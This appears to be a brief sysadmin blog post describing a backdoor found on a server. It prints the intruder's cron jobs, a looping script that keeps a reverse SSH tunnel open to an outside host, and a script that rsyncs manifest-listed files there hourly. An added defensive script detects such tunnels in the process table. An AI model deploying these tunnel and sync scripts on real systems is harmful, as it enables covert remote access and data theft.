today i was looking at some odd behavior on a server.
and look what i found... a reverse tunnel and data syncs every hour.
satan 8287 0.0 0.0 10840 584 ? S 2014 0:01 /bin/bash ./tun1
satan 17363 0.0 0.0 40896 2652 ? S 10:33 0:00 ssh -c arcfour,blowfish-cbc -R 8000:localhost:22 -i /home/satan/stairwaytoheaven/
i decided to check and see if satan has a scheduled task. he does.
crontab -l -u satan
@hourly bash -c "cd /home/satan/stairwaytoheaven; get pull >> stairwaytoheaven.log 2>> stairwaytoheaven.err && ./hellSync.sh"
@monthly bash -c "cd /home/satan/stairwaytoheaven; rm stairwaytoheaven.err; rm stairwaytoheaven.log"
crontab: a copy of the above
stairwaytoheaven.err: a file with errors resultant from stairwaytoheaven.sh
stairwaytoheaven.log: a log of what's going on
manifest: a list of files generated from get pull command
satan.pem: satan's key
stairwaytoheaven.sh: rsync job going over a reverse tunnel to aserverinhell
tun1
#!/bin/bash
sleep 2
while true; do
echo Starting connection 1 on `date`
ssh -c arcfour,blowfish-cbc -R 8000:localhost:22 -i /home/satan/stairwaytoheaven/satan.pem lucifer@aserverinhell -N
echo Connection 1 died on `date`
sleep 15
done
hellSync.sh
#!/bin/bash
chmod 600 /home/satan/stairwaytoheaven/satan.pem
echo -n "--- START " >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null
date >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null
rsync -avz -r --recursive --delete --files-from=./manifest -e "ssh -i /home/satan/stairwaytoheaven/satan.pem" / lucifer@aserverinhell:/ >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null
echo "--- END" >> stairwaytoheaven.log 2>> stairwaytoheaven.err < /dev/null
Thursday, May 28, 2015
reverse tunnel transfer to aserverinhell
nasty satan.
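One way to spot a tunnel like tun1 from the process table, as an added example that is not part of the original post: the function reads ps aux-style text on stdin and reports every ssh client started with a -R remote forward. The function names and the sample lines (users alice, bob and carol, hosts under example.test) are constructed for illustration, and forwards configured through RemoteForward in ssh_config are not covered.

```shell
#!/bin/bash
# Added example, not from the original post.
# Prints "user pid forward-spec" for each ssh client that asks for a remote forward.

find_reverse_tunnels() {
    awk '
    {
        # ps aux layout: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND...
        n = split($11, path, "/")
        if (path[n] != "ssh") next            # skip bash, rsync -e ssh, and so on
        for (i = 12; i <= NF; i++) {
            spec = ""
            if ($i == "-R" && i < NF) spec = $(i + 1)      # -R 8000:localhost:22
            else if ($i ~ /^-R./)     spec = substr($i, 3) # -R8000:localhost:22
            # A forward spec has a colon or is a bare port; this drops
            # remote commands such as: ssh host ls -R /tmp
            if (spec ~ /:/ || spec ~ /^[0-9]+$/) print $1, $2, spec
        }
    }'
}

# Constructed sample input, modelled on the process listing in the post.
sample_ps() {
    cat <<'EOF'
satan 8287 0.0 0.0 10840 584 ? S 2014 0:01 /bin/bash ./tun1
satan 17363 0.0 0.0 40896 2652 ? S 10:33 0:00 ssh -c arcfour,blowfish-cbc -R 8000:localhost:22 -i /home/satan/stairwaytoheaven/satan.pem lucifer@aserverinhell -N
alice 2201 0.0 0.0 40896 2652 pts/0 S+ 10:40 0:00 ssh alice@build.example.test
bob 2310 0.0 0.0 40896 2652 ? S 10:41 0:00 /usr/bin/ssh -N -R2222:localhost:22 bob@jump.example.test
carol 2402 0.0 0.0 9000 900 ? S 10:42 0:00 rsync -avz -r -e ssh /srv carol@backup.example.test:/srv
EOF
}

sample_ps | find_reverse_tunnels
```

On a live host, pipe real output into it: ps aux | find_reverse_tunnels.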